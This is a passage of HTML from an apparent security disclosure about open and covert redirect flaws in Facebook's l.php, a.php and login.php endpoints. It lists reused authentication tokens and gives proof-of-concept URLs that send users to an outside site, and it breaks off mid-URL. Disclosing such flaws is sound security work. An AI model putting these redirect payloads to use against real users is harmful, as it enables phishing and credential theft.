<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=zAQHEyzSM&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=zAQHEyzSM&s=1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fweborama.com%2F&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fweborama.<wbr></wbr>com%2F&h=DAQEpwCpS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=DAQEpwCpS&s=1" target="_blank">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=DAQEpwCpS&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
<div>
<a href="http://bg-bg.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=wAQEE6xBX&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://bg-bg.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=wAQEE6xBX&s=1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2.2)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><2>Second test. It is the same situation as above. </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a>file: "l.php",</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>url parameter "u" </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><c>authentication parameter: "h"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><d>form: "h=<wbr></wbr>hAQHalW1CAQHrkVIQNNqgwhxRWLNsF<wbr></wbr>VeH3auuImlbR1CgKA". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><e>The authentication has no relation to all other parameters, such as "env", "s". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 1:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.internet.<wbr></wbr>org%2F&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4-z2Pm7C63N&<wbr></wbr>s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-Redirect" target="_blank">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=<wbr></wbr>pAQHnUOVGAQGcsXLy0MBttG7W1uiOv<wbr></wbr>Sghc_POwYa6k35hbw&enc=<wbr></wbr>AZNBNYyWIbhPD6ZDAw1Zom458dO6dN<wbr></wbr>BHnPh1tWnzEgxsxqvjfAbnH1ynSYgN<wbr></wbr>NOvQzY7oolrIRfkll4</a><a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.internet.org%2F&h=pAQHnUOVGAQGcsXLy0MBttG7W1uiOvSghc_POwYa6k35hbw&enc=AZNBNYyWIbhPD6ZDAw1Zom458dO6dNBHnPh1tWnzEgxsxqvjfAbnH1ynSYgNNOvQzY7oolrIRfkll4-z2Pm7C63N&s=1" target="_blank">-z2Pm7C63N&<wbr></wbr>s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>Redirect Works:</b></span></div>
<div>
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw&enc=AZM7oFmJObAuJmy999wnRjD-QralcP-Ust3CHBrFxZ85bS1oI5vS46cPhdJmYq6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw<wbr></wbr>&enc=AZM7oFmJObAuJmy999wnRjD-<wbr></wbr>QralcP-<wbr></wbr>Ust3CHBrFxZ85bS1oI5vS46cPhdJmY<wbr></wbr>q6YcfsTcZYBrPTRsZyEeHCe_rdQ&s=<wbr></wbr>1</span></a></div>
<div>
<a href="http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=1AQFqhVX6AQGawLw_EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com/l.php?<wbr></wbr>u=http%3A%2F%2Fwww.tetraph.<wbr></wbr>com&h=1AQFqhVX6AQGawLw_<wbr></wbr>EuB6T8h4Fs6JXFOocaRp0tQKr6Mfxw</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>URL 2:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DNdWaZkvAJfM&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>youtube.com%2Fwatch%3Fv%<wbr></wbr>3DNdWaZkvAJfM&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Forbidden:</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=GAQHkk7KaAQFgp-1UpPt8vTc1mpZVcR-ZCObBHYZTd6oRUA&enc=AZPA-1iOt4L5BTDo2RMqXagplQxCjYMuw6LZzH3XdMeOpvvcwMdzZwplx5OZLlH0q8QszFr2Nu9Ib_tA8l8So-pW&s=1" target="_blank">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=GAQHkk7KaAQFgp-<wbr></wbr>1UpPt8vTc1mpZVcR-<wbr></wbr>ZCObBHYZTd6oRUA&enc=AZPA-<wbr></wbr>1iOt4L5BTDo2RMqXagplQxCjYMuw6L<wbr></wbr>ZzH3XdMeOpvvcwMdzZwplx5OZLlH0q<wbr></wbr>8QszFr2Nu9Ib_tA8l8So-pW&s=1</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Redirect Works:</b></span></div>
<div>
<a href="http://af-za.facebook.com/l.php?u=http%3A%2F%2Fwww.tetraph.com&h=WAQEcLD6fAQHtLbKKDhiimLXlIIx0zoyjfyusHjY5YHmaGQ&enc=AZMtxhh0RHpegvMkZLG-uyFxqCzDxCefM9H2AF8TnVCTtGMnwy5WVA4EPcZVOiJ0wOFCui6nWmRBqQDoZE0cVww6&s=1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://af-za.facebook.com/l.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&h=<wbr></wbr>WAQEcLD6fAQHtLbKKDhiimLXlIIx0z<wbr></wbr>oyjfyusHjY5YHmaGQ&enc=<wbr></wbr>AZMtxhh0RHpegvMkZLG-<wbr></wbr>uyFxqCzDxCefM9H2AF8TnVCTtGMnwy<wbr></wbr>5WVA4EPcZVOiJ0wOFCui6nWmRBqQDo<wbr></wbr>ZE0cVww6&s=1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3) Facebook File "a.php" Open Redirect Security Vulnerability</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.1)</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a>file: "a.php"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"> <b>parameter "u"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><c> authentication parameter: "eid"</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><d> form: "eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w". </span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><e>The authentication has no relation to all other parameters, such as "mac", "_tn_".</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Examples:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL:</b></span></div>
<div>
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Ffb-nym.adnxs.com%2Ffclick%3Fclickenc%3Dhttp%253A%252F%252Fbs.serving-sys.com%252FBurstingPipe%252FadServer.bs%253Fcn%253Dtf%2526c%253D20%2526mc%253Dclick%2526pli%253D8782431%2526PluID%253D0%2526ord%253D%257BCACHEBUSTER%257D%26cp%3D%253Fdi%253DzGxX6INl-T9QvRSibN_3P5qZmZmZmfk_UL0Uomzf9z_ObFfog2X5P_WPPCuD-to_CKEeLew3cQIQkc9SAAAAAHQcDQB2BQAAKAcAAAIAAAD4iq8AanMCAAAAAQBVU0QAVVNEAGMASABq4DoFka4BAgUCAQUAAIgAkinLswAAAAA.%252Fcnd%253D%252521qQYdPgjeqqYBEPiVvgUY6uYJIAA.%252Freferrer%253Dfacebook.com%252F&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Ffb-nym.<wbr></wbr>adnxs.com%2Ffclick%3Fclickenc%<wbr></wbr>3Dhttp%253A%252F%252Fbs.<wbr></wbr>serving-sys.com%<wbr></wbr>252FBurstingPipe%252FadServer.<wbr></wbr>bs%253Fcn%253Dtf%2526c%253D20%<wbr></wbr>2526mc%253Dclick%2526pli%<wbr></wbr>253D8782431%2526PluID%253D0%<wbr></wbr>2526ord%253D%257BCACHEBUSTER%<wbr></wbr>257D%26cp%3D%253Fdi%<wbr></wbr>253DzGxX6INl-T9QvRSibN_<wbr></wbr>3P5qZmZmZmfk_UL0Uomzf9z_<wbr></wbr>ObFfog2X5P_WPPCuD-to_<wbr></wbr>CKEeLew3cQIQkc9SAAAAAHQcDQB2BQ<wbr></wbr>AAKAcAAAIAAAD4iq8AanMCAAAAAQBV<wbr></wbr>U0QAVVNEAGMASABq4DoFka4BAgUCAQ<wbr></wbr>UAAIgAkinLswAAAAA.%252Fcnd%<wbr></wbr>253D%<wbr></wbr>252521qQYdPgjeqqYBEPiVvgUY6uYJ<wbr></wbr>IAA.%252Freferrer%<wbr></wbr>253Dfacebook.com%252F&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
<div>
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&mac=AQJllyaGzLYoRoQz&__tn__=%2AB&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&mac=<wbr></wbr>AQJllyaGzLYoRoQz&__tn__=%2AB&<wbr></wbr>eid=5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
<div>
<a href="https://www.facebook.com/a.php?u=http%3A%2F%2Fwww.tetraph.com&eid=5967147530925355409.6013336879369.AQKBG5nt468YgKeiSdgExZQRjwGb9r6EOu-Uc5WPvi-EVHEzadq8YSrgSvUzbMmxKPPfTgM-JrPff7tN38luc-8h16lxL0Gj_4qs1-58yWgXirMH4AEf8sOEsZc5DTx7yFndgODvD5NrC-314BIj4pZvMhlljXv89lHRH6pBgyGGVm-oWBDIF8CuRER1f5ZGbKdsiUcBISdWTninVzvBdW1mZY0SWzqT21fZmhgVKtdkRf5l_pag7hAmotFK9HI5XHfGicWVqzRyTNiDIYjyVjTv4km2FOEp7WP3w65aVUKP_w" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/a.<wbr></wbr>php?u=http%3A%2F%2Fwww.<wbr></wbr>tetraph.com&eid=<wbr></wbr>5967147530925355409.<wbr></wbr>6013336879369.<wbr></wbr>AQKBG5nt468YgKeiSdgExZQRjwGb9r<wbr></wbr>6EOu-Uc5WPvi-<wbr></wbr>EVHEzadq8YSrgSvUzbMmxKPPfTgM-<wbr></wbr>JrPff7tN38luc-8h16lxL0Gj_4qs1-<wbr></wbr>58yWgXirMH4AEf8sOEsZc5DTx7yFnd<wbr></wbr>gODvD5NrC-<wbr></wbr>314BIj4pZvMhlljXv89lHRH6pBgyGG<wbr></wbr>Vm-<wbr></wbr>oWBDIF8CuRER1f5ZGbKdsiUcBISdWT<wbr></wbr>ninVzvBdW1mZY0SWzqT21fZmhgVKtd<wbr></wbr>kRf5l_<wbr></wbr>pag7hAmotFK9HI5XHfGicWVqzRyTNi<wbr></wbr>DIYjyVjTv4km2FOEp7WP3w65aVUKP_<wbr></wbr>w</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(3.2) Facebook Login Page Covert Redirect Security Vulnerability</b></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Vulnerable URL Related to Login.php Based on a.php:</b></span></div>
<div>
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.rp.edu.sg%252Fopenhouse2014%252F%253Futm_source%253Dfacebook%2526utm_medium%253Dcpc%2526utm_campaign%253Dopenhouse2014%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0QEVETs_Cs9pS9QBkgX8yVPJCHuk1v_xkj4EHHH9sNP7a4GRs8olklBTKhCcJ908sVrQVT2I-cQYw2SVU9hWaWWjX2AGt3WpdT2kx6SIPoPQpX5cIC4Lcfaa7EcZFBnoQPv3mR5BNHRFTh_6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBtj5smz0ZeGT5JWvub5ORJ4xzVN0zAW8V4qiKiVFKTEFMZASaZFon41VFCbhxkX0Bi62Ko64PY6uP64tCMWh6yX2o0JMc0mJWFJRp1695OCKgLXf0udRyWDESTyYgJXIlxecCmlwCEbleAsE-wtDXNOfDTXOzApr1sZO_58FBRaw-K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-UqdakiEEIBq750KxVjaAdCyqJp_5EJ-yVMK3f2pMX7cQ2Lw6u434hHimuLN9VDPLkpSiMlPOa8RkarDSred73IfQiv-PluegYDfunZFxj1KvcAlzhVZsL-a52hJmXrOrzKuV0hyZaBLtAIo6AEoXXV30D-6iraSUphkOFzYt3ah6oRrmXLQZKm2E8Cuag5d_rAnwvIr98dn4OSa8Z4MCZemI3uH8cjxr86aE046uTA_Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h6WiUO-jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl18iaN8wkylsTk8aVBn6G1xZadSL0b5R3NgsYfQUVtV0g9slnOLNkgq0NLMAk0kWFs" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/<wbr></wbr>login.php?next=https%3A%2F%<wbr></wbr>2Fwww.facebook.com%2Fa.php%<wbr></wbr>3Fu%3Dhttp%253A%252F%252Fwww.<wbr></wbr>rp.edu.sg%252Fopenhouse2014%<wbr></wbr>252F%253Futm_source%<wbr></wbr>253Dfacebook%2526utm_medium%<wbr></wbr>253Dcpc%2526utm_campaign%<wbr></wbr>253Dopenhouse2014%26mac%<wbr></wbr>3DAQKyRHClixA20iGL%26__tn__%<wbr></wbr>3D%252AB%26eid%<wbr></wbr>3DAQLAHC7szSXhT3FaEBXe5YFsOC0k<wbr></wbr>EM4nN9PlVovdilvuzROStFXoYqptlK<wbr></wbr>pcJAzHNTLpxWAIrmJYsR6RVG_<wbr></wbr>Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_<wbr></wbr>eVS895Eh6fSwxH3fgfWcNDrEl5_<wbr></wbr>lFgRbrJtC71R68rW_<wbr></wbr>VXS9QCN7Po9wTWDnbyZTaXawdrdQyi<wbr></wbr>bryvA56Spr5GcUDUboRFxy8YSr2ahU<wbr></wbr>V_<wbr></wbr>goDAQA3OKmCACEn8CmyMrOT5gZq3iw<wbr></wbr>usysdchRxLIv5N82-<wbr></wbr>GMTiDxXXgkDYf1P7XwvklWpfy_<wbr></wbr>cEItZzV5v0P7fRZB3qiq_<wbr></wbr>RDx9jhEzndlJhUJL2aWE0ldPmGKGz9<wbr></wbr>xWyvPaPLOwzBo23GQbpj2ZN_<wbr></wbr>tw9B9tz2l3tGIN1yegd_<wbr></wbr>Wf6PSFIZOuBXfZILvmILcxg3qz4dHx<wbr></wbr>1fmgPZBpf_34mPnMEkgZqbT2WeV_<wbr></wbr>GZKz8RDIg88D3vrmwyMwWxeh3xyGud<wbr></wbr>djZUjOUjPCUwrgSrWZK3XHRA7TA7tW<wbr></wbr>IsQ4X1bsjx9c72mm8bZmmRBRJwqOcj<wbr></wbr>sW0QEVETs_<wbr></wbr>Cs9pS9QBkgX8yVPJCHuk1v_<wbr></wbr>xkj4EHHH9sNP7a4GRs8olklBTKhCcJ<wbr></wbr>908sVrQVT2I-<wbr></wbr>cQYw2SVU9hWaWWjX2AGt3WpdT2kx6S<wbr></wbr>IPoPQpX5cIC4Lcfaa7EcZFBnoQPv3m<wbr></wbr>R5BNHRFTh_<wbr></wbr>6Qvr01BrCG3Fv5VeDeXhM8cHk6VuBt<wbr></wbr>j5smz0ZeGT5JWvub5ORJ4xzVN0zAW8<wbr></wbr>V4qiKiVFKTEFMZASaZFon41VFCbhxk<wbr></wbr>X0Bi62Ko64PY6uP64tCMWh6yX2o0JM<wbr></wbr>c0mJWFJRp1695OCKgLXf0udRyWDEST<wbr></wbr>yYgJXIlxecCmlwCEbleAsE-<wbr></wbr>wtDXNOfDTXOzApr1sZO_58FBRaw-<wbr></wbr>K4Z2VRXLir5mrdXTKnM1Y4rDDqGZur<wbr></wbr>9G7LfuXrCr5oR1J5LJ8sVupHqsiN7-<wbr></wbr>UqdakiEEIBq750KxVjaAdCyqJp_<wbr></wbr>5EJ-<wbr></wbr>yVMK3f2pMX7cQ2Lw6u434hHimuLN9V<wbr></wbr>DPLkpSiMlPOa8RkarDSred73IfQiv-<wbr></wbr>PluegYDfunZFxj1KvcAlzhVZsL-<wbr></wbr>a52hJmXrOrzKuV0hyZaBLtAIo6AEoX<wbr></wbr>XV30D-<wbr></wbr>6iraSUphkOFzYt3ah6oRrmXLQZKm2E<wbr></wbr>8Cuag5d_<wbr></wbr>rAnwvIr98dn4OSa8Z4MCZemI3uH8cj<wbr></wbr>xr86aE046uTA_<wbr></wbr>Hm1GjYM5l7wkpHknHI8QR2q5Cioo2h<wbr></wbr>6WiUO-<wbr></wbr>jsIFkQ4XFgAd5IUCcAbQukXdC4GJzl<wbr></wbr>18iaN8wkylsTk8aVBn6G1xZadSL0b5<wbr></wbr>R3NgsYfQUVtV0g9slnOLNkgq0NLMAk<wbr></wbr>0kWFs</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC:</b></span></div>
<div>
<a href="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fa.php%3Fu%3Dhttp%253A%252F%252Fwww.tetraph.com%26mac%3DAQKyRHClixA20iGL%26__tn__%3D%252AB%26eid%3DAQLAHC7szSXhT3FaEBXe5YFsOC0kEM4nN9PlVovdilvuzROStFXoYqptlKpcJAzHNTLpxWAIrmJYsR6RVG_Htk6pgT7Iol6lWHDJvn7Cg5sqigvE_eVS895Eh6fSwxH3fgfWcNDrEl5_lFgRbrJtC71R68rW_VXS9QCN7Po9wTWDnbyZTaXawdrdQyibryvA56Spr5GcUDUboRFxy8YSr2ahUV_goDAQA3OKmCACEn8CmyMrOT5gZq3iwusysdchRxLIv5N82-GMTiDxXXgkDYf1P7XwvklWpfy_cEItZzV5v0P7fRZB3qiq_RDx9jhEzndlJhUJL2aWE0ldPmGKGz9xWyvPaPLOwzBo23GQbpj2ZN_tw9B9tz2l3tGIN1yegd_Wf6PSFIZOuBXfZILvmILcxg3qz4dHx1fmgPZBpf_34mPnMEkgZqbT2WeV_GZKz8RDIg88D3vrmwyMwWxeh3xyGuddjZUjOUjPCUwrgSrWZK3XHRA7TA7tWIsQ4X1bsjx9c72mm8bZmmRBRJwqOcjsW0